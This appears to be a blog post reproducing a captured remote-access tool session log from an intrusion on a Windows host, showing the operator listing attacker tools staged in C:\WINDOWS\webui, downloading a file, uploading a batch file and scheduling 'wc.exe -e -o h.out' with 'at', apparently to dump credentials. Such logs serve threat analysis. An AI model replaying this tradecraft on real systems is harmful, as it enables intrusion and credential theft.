DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR https.dll 5282 129984516342112452
DIR netstat.dll 109092 129984523001118148
DIR netuse.dll 11844 129984451183437846
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR svchost.dll 1230 129984514039992804
DIR system.dll 5711 129984506561910154
DIR wc.exe 208384 129984448197760606
COMMAND: DOWN FILES (C:\WINDOWS\webui\netstat.dll)
TOKEN: FILE SIZE (C:\WINDOWS\webui\netstat.dll: 109092)
COMMAND: CONTINUE
TOKEN: FILE DATA (8183)
COMMAND: CONTINUE
TOKEN: FILE DATA (8183)
...snip...COMMAND: CONTINUE
TOKEN: FILE DATA (2713)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
net time
net time
Current time at \\DC-USTXHOU is 11/26/2012 7:25 PM
The command completed successfully.
C:\WINDOWS\webui>
COMMAND: FILE SIZE (C:\WINDOWS\webui\system5.bat: 88)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (88)
TOKEN: DATA CONTINUE
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR https.dll 5282 129984516342112452
DIR netstat.dll 109092 129984523001118148
DIR netuse.dll 11844 129984451183437846
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR svchost.dll 1230 129984514039992804
DIR system.dll 5711 129984506561910154
DIR system5.bat 88 129984532078388142
DIR wc.exe 208384 129984448197760606
system5.bat
system5.bat
1 file(s) copied.
Added a new job with job ID = 1
C:\WINDOWS\webui>
at
at
Status ID Day Time Command Line
-------------------------------------------------------------------------------
1 Today 7:30 PM wc.exe -e -o h.out
C:\WINDOWS\webui>
at
at
Status ID Day Time Command Line
-------------------------------------------------------------------------------
1 Today 7:30 PM wc.exe -e -o h.out
C:\WINDOWS\webui>
net time
net time
Current time at \\DC-USTXHOU is 11/26/2012 7:31 PM
The command completed successfully.
C:\WINDOWS\webui>
at
at
Status ID Day Time Command Line
-------------------------------------------------------------------------------
1 Today 7:30 PM wc.exe -e -o h.out
C:\WINDOWS\webui>
at
at
Status ID Day Time Command Line
-------------------------------------------------------------------------------
1 Today 7:30 PM wc.exe -e -o h.out
C:\WINDOWS\webui>
net start
net start
These Windows services are started:
Application Layer Gateway Service
Automatic Updates
COM+ Event System
Computer Browser
Cryptographic Services
DCOM Server Process Launcher
DHCP Client
Distributed Link Tracking Client
DNS Client
Error Reporting Service
Event Log
Help and Support
IPSEC Services
Logical Disk Manager
Microsoft Device Manager
Net Logon
Network Connections
Network Location Awareness (NLA)
Plug and Play
Print Spooler
Protected Storage
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Registry
Secondary Logon
Security Accounts Manager
Server
Shell Hardware Detection
SSDP Discovery Service
System Event Notification
System Restore Service
Task Scheduler
TCP/IP NetBIOS Helper
Telephony
Terminal Services
Themes
WebClient
Windows Audio
Windows Firewall/Internet Connection Sharing (ICS)
Windows Management Instrumentation
Windows Time
Wireless Zero Configuration
Workstation
The command completed successfully.
C:\WINDOWS\webui>
No comments:
Post a Comment